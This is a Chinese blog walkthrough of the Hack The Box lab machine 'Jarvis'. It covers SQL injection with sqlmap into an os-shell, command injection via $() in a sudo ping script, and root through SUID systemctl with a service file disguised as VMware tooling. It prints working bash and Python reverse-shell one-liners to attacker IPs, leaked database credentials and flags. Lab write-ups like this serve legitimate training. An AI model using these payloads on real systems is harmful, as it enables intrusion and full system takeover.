HTB linux Jarvis

Posted on | In
Words count in article: 1.1k | Reading time ≈ 5

简介
sql注入获取webshell,sudoers搭配操作系统命令执行获取pepper reverse shell,suid创建systemd服务提权。

靶机状态: rooted.

简介

文章目录

  • nmap && sqlmap
  • LinEnum && 命令执行
  • suid && systemd

nmap && sqlmap

端口扫面发现22端口OpenSSH 7.4p1,80端口Apache httpd 2.4.25;WEB中间件不存在cve, 直接扫目录,看是否存在敏感信息,同时开始配置host, 查看WEB页面。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ nmap -sC -sV -oA Javris/nmap/Jarvis 10.10.10.143
# Nmap 7.70 scan initiated Tue Jul  9 22:02:25 2019 as: nmap -sC -sV -oA Jarvis/nmap/Jarvis 10.10.10.143
Nmap scan report for 10.10.10.143
Host is up (0.32s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
|   256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_  256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Stark Hotel
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jul  9 22:26:03 2019 -- 1 IP address (1 host up) scanned in 1418.35 seconds

然后在 http://10.10.10.143/room.php?cod=2 页面发现sql注入,sqlmap上去跑库、表、用户、读flag、获取os-shell,最后发现获取os-shell是正解。

1
2
3
4
5
6
7
8
# payload: cod=8 AND (SELECT 7865 FROM (SELECT(SLEEP(5)))SzuN)

# 查看主机名
$ sqlmap -u http://10.10.10.143/room.php\?cod\=2 -v3 --hostname --batch
jarvis

$ sqlmap -u http://10.10.10.143/room.php\?cod\=2 -v3 --os-shell --batch
os-shell> /bin/bash -i >& /dev/tcp/10.10.15.234/4444 0>&1

进入webshell之后收集信息,发现php配置文件, 尝试用配置中的用户密码登陆ssh,无果。

1
2
3
<?php
$connection=new mysqli('127.0.0.1','DBadmin','imissyou','hotel');
?>

LinEnum && 命令执行

www-data 信息收集未发现有用内容,运行LinEnum.sh收集信息发现www-data用户的sudoers配置

1
2
3
4
5
6
7
8
www-data@jarvis:/var/www/Admin-Utilities$ sudo -l
sudo -l
Matching Defaults entries for www-data on jarvis:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py

查看”/var/www/Admin-Utilities/simpler.py”源码, 关键代码如下:

1
2
3
4
5
6
7
8
def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)

exec_ping中处理命令执行时,忽略了对$符号的检测,因此利用$()可以读取user.txt和获取反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
www-data@jarvis:/var/www/html$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
<do -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
     _                 _
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/
                                @ironhackers.es

***********************************************

Enter an IP: $(cat /home/pepper/user.txt)
ping: 2afa36c4f05b37b34259c93551f5c44f: Temporary failure in name resolution

# 编写反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.187",4447));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

# 执行反弹shell
www-data@jarvis:/tmp$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
     _                 _
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/
                                @ironhackers.es

***********************************************

Enter an IP: $(/bin/bash /tmp/owef.sh)

# 攻击机器运行nc监听端口,获取反弹shell
nc -lv 4447
bash: cannot set terminal process group (599): Inappropriate ioctl for device
bash: no job control in this shell
pepper@jarvis:/tmp$ id
id
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)

suid && systemd

获取到pepper的shell后,运行LinEnum.sh收集信息,发现/bin/systemctl被设置了suid,在GTFObins中查看利用方法

1
2
3
4
5
6
7
8
9
10
sudo sh -c 'cp $(which systemctl) .; chmod +s ./systemctl'

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF

pepper 因此编写自己的提权服务,通过systemctl运行安装、运行提权服务获取root权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# 执行编写owef.service
[Unit]
Description=Authentication service for virtual machines hosted on VMware
Documentation=http://github.com/vmware/open-vm-tools

[Service]
ExecStart=/bin/bash /home/pepper/owef.sh

[Install]
WantedBy=multi-user.target

# 利用systemctl创建服务
$ /bin/systemctl link /home/pepper/owef.service
$ /bin/systemctl enable --now owef.service

$ nc -lv 4448
bash: cannot set terminal process group (11105): Inappropriate ioctl for device
bash: no job control in this shell
root@jarvis:/# cd
cd
bash: cd: HOME not set
root@jarvis:/# cd /root
cd /root
root@jarvis:/root# cat root.txt
cat root.txt
d41d8cd98f00b204e9800998ecf84271
root@jarvis:/root#

owefsad wechat
进击的DevSecOps,持续分享SAST/IAST/RASP的技术原理及甲方落地实践。如果你对 SAST、IAST、RASP方向感兴趣,可以扫描下方二维码关注公众号,获得更及时的内容推送。
0%